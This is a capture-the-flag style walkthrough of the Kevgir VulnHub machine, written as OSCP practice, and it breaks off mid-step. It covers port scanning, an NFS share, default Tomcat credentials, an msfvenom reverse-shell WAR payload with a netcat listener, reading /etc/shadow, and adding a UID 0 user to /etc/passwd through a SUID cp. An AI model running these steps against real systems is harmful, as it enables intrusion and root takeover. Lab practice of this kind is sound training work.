This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. This machine is the next on list and it can be downloaded on: vulnhub
The challenge or goal of the machine lists the following:
Kevgir has designed by canyoupwnme team for training, hacking practices and exploiting. Kevgir has lots of vulnerable services and web applications for testing. We are happy to announced that.https://www.vulnhub.com/entry/kevgir-1,137/
The walk-through will be divided in a couple sections following the standard penetration testing process: Information gathering –> Exploitation –> Post exploitation. It could be divided into more steps, but for complicity we do these three.
To start of we will find the IP address of the machine with nmap since netdiscover takes a while on my VMware. We will use the command
sudo nmap -sn 192.168.0.0/24 for this. The vulnerable machine has the IP
So to start of the machine we scan the machine for open ports with nmap. We will do two scans;
sudo nmap -sV -sC 192.168.0.138 -oA nmap and
sudo nmap -sV -sC -p- 192.168.0.138 -oA fullnmap. We use these parameters for;
-sV service and version enumeration,
-sC is for basic script usage.
-p- to do a full port scan.
-oA to save all output to a couple different files.
The nmap results are;
# Nmap 7.80 scan initiated Tue Feb 18 13:46:13 2020 as: nmap -sV -sC -oA nmap 192.168.0.138 Nmap scan report for 192.168.0.138 Host is up (0.000068s latency). Not shown: 990 closed ports PORT STATE SERVICE VERSION 25/tcp open ftp vsftpd 3.0.2 |_smtp-commands: SMTP: EHLO 530 Please login with USER and PASS.\x0D 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Kevgir VM 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100003 2,3,4 2049/udp nfs | 100003 2,3,4 2049/udp6 nfs | 100005 1,2,3 32979/udp6 mountd | 100005 1,2,3 37206/tcp mountd | 100005 1,2,3 47667/tcp6 mountd | 100005 1,2,3 48358/udp mountd | 100021 1,3,4 37042/tcp6 nlockmgr | 100021 1,3,4 37283/udp nlockmgr | 100021 1,3,4 37795/udp6 nlockmgr | 100021 1,3,4 56540/tcp nlockmgr | 100024 1 44928/udp status | 100024 1 52040/tcp status | 100024 1 52398/tcp6 status | 100024 1 53714/udp6 status | 100227 2,3 2049/tcp nfs_acl | 100227 2,3 2049/tcp6 nfs_acl | 100227 2,3 2049/udp nfs_acl |_ 100227 2,3 2049/udp6 nfs_acl 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP) 1322/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 17:32:b4:85:06:20:b6:90:5b:75:1c:6e:fe:0f:f8:e2 (DSA) | 2048 53:49:03:32:86:0b:15:b8:a5:f1:2b:8e:75:1b:5a:06 (RSA) | 256 3b:03:cd:29:7b:5e:9f:3b:62:79:ed:dc:82:c7:48:8a (ECDSA) |_ 256 11:99:87:52:15:c8:ae:96:64:73:d6:49:8c:d7:d7:9f (ED25519) 2049/tcp open nfs_acl 2-3 (RPC #100227) 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | http-methods: |_ Potentially risky methods: PUT DELETE |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat 8081/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Joomla! 1.5 - Open Source Content Management | http-robots.txt: 14 disallowed entries | /administrator/ /cache/ /components/ /images/ | /includes/ /installation/ /language/ /libraries/ /media/ |_/modules/ /plugins/ /templates/ /tmp/ /xmlrpc/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Welcome to the Frontpage 9000/tcp open http Jetty winstone-2.9 | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Jetty(winstone-2.9) |_http-title: Dashboard [Jenkins] MAC Address: 00:0C:29:A2:8E:AF (VMware) Service Info: Host: CANYOUPWNME; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 19m59s, deviation: 1h09m16s, median: 59m58s |_nbstat: NetBIOS name: CANYOUPWNME, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 4.1.6-Ubuntu) | Computer name: canyoupwnme | NetBIOS computer name: CANYOUPWNME\x00 | Domain name: | FQDN: canyoupwnme |_ System time: 2020-02-18T21:46:24+02:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-02-18T19:46:24 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Feb 18 13:46:29 2020 -- 1 IP address (1 host up) scanned in 16.11 seconds
Well that is a lot of ports. To keep it short we got the following ports:
– 25 ftp which includes a user in the banner
– 80 apache httpd
– 111 with some possible nfs sahres, which we might be able to mount
– 139, 445 netbio samba
– 1322 ssh
– 2049 rpc
– 8080 apache tomcat
– 8081 apache
– 9000 http Jetty
We start with the ftp port since we might have a user and there might be some files with more information. We can not login with USER and PASS or Anonymous. It is asking for our USER and PASS which we need to supply in Telnet. Well I learned something I guess haha :p
On port 80 we got a pretty empty webserver/webpage. But to be sure we can run nikto to find possible vulnerabilties and dirb to fuzz directories. We will run
nikto -host http://192.168.0.138 -output nikto.txt and
dirb http://192.168.0.138 -o dirb.txt. So lets have a look at the results:
We found a /phpmyadmin/ directory. We tried some basic credentials but we couldn’t login. We got the message
1045 Cannot log in to the MySQL server every time we tried to login. I googled the error message and it seems the mysql server is down or there is no account set. No problem. Not going to dive to deep into this. There is a lot more to explore!
Lets see port 111 since we have a lot more with the rpcbind then on other machines. I may finally get to test this a bit. With the command
showmount -e 192.168.0.138 we see that there is a /backup directory mountable. With the command
mount -t nfs 192.168.0.138:/backup /tmp/backupmount we can mount the /backup directory.
-t is used to set the type to nfs.
192.168.0.138:/backup is the share we want to mount, and
/tmp/backupmount is where we want to mount it to. In the directory is a file named backup.tar.bz2.zip. Seems to be compressed a couple times.
I tried unzipping the file but it has been password protected. Some basic passwords did not work! We may find some passwords later, I don’t feel like bruteforcing it at the moment.
There are some other webservices running. There should be tomcat on port 8080. Lets run another Dirb and Nikto scan, like we did before on port 80. This are the results:
We found a couple manager directories. All password protected but I managed to login with tomcat:tomcat in
/manager, /host-manager, /manager/status. This is a good start. Lets find a possible exploit!
To exploit TomCat I found several metasploit modules which can abuse the /manager deployer or upload. I’m not interested in using metasploit at the moment.
so lets google to find a way to exploit since there is an upload availability for deploying a directory file, XML file or WAR file.
This guide show the metasploit way, but also a way to generate a war file with msfvenom. No idea this was possible, awesome! Lets do it!!! We can do this with the following payload:
msfvenom -p java/shell_reverse_tcp lhost=192.168.0.129 lport=1234 -f war -o ~/kevgir/exploit.war. We can now upload the file in the WAR file deploy section, start our listener and click on the /exploit directory. We can start our listener with
nc -lvp 1234 and click on the /exploit directory in the tomcat manager. And we got a shell as the tomcat user!
I’m not going to write all the things I try during my priv escalation. But if I find something that doesn’t work I will write it down. A good guide to find possible privilege escalation is this one from g0tmi1k.
I found a priv escalation way through an kernal exploit. But this normally isn’t the way intended for a vulnerable machine, so to learn more we will look for something else. But it should be possible since it is running an old Ubuntu version and kernel.
I got a full tty shell with the following command:
python -c 'import pty; pty.spawn("/bin/bash")'
vsftpd,smbd and rpcbind is running as root (ps aux | grep root)
/var/www/html/ folder we found a file
configaration.php which contains the database credentials and a server secret. In the database we found the administrator password hash for joomla:
Hash-identiefier tells us it is an md5 hash with a salt. Lets try to crack this online. Did not found anything since there is a salt. Tried cracking it with hashcat and rockyou.txt but no luck. I was bruteforcing it but it ran for a bit and I had no luck.
With the command
find /bin -perm -4000, I found a SUIT bit set on CP. So we can copy any file as root? I copied the /etc/shadow file to /tmp/shadow to check if it worked. And we could see it:
Interesting, I think I can copy the /etc/passwd file to /tmp/passwd. To exploit this file we have to do the following:
Generate an hash for a password with
openssl passwd foo where the password is foo. The hash is
Then we cat the /etc/passwd file and copy the root entry:
Then we edit this entry with another username but the same ID, so we can login with it, and we replace the x with the hash. So we get:
roott:7kTk8t7eAN5xQ:0:0:root:/root:/bin/bash. But we can not echo this to
/etc/passwd this, since the permissions are not right! I should have checked for it before I did this all.
4 -rw-r--r-- 1 root tomcat7 1446 Feb 18 23:52 passwd.
I went around this by catting the output to another file named passwd in another directory and echo the new line for passwd
/tmp/test/passwd. Then we can copy this
/tmp/test/passwd file to
/etc/passwd with the SUID bit set op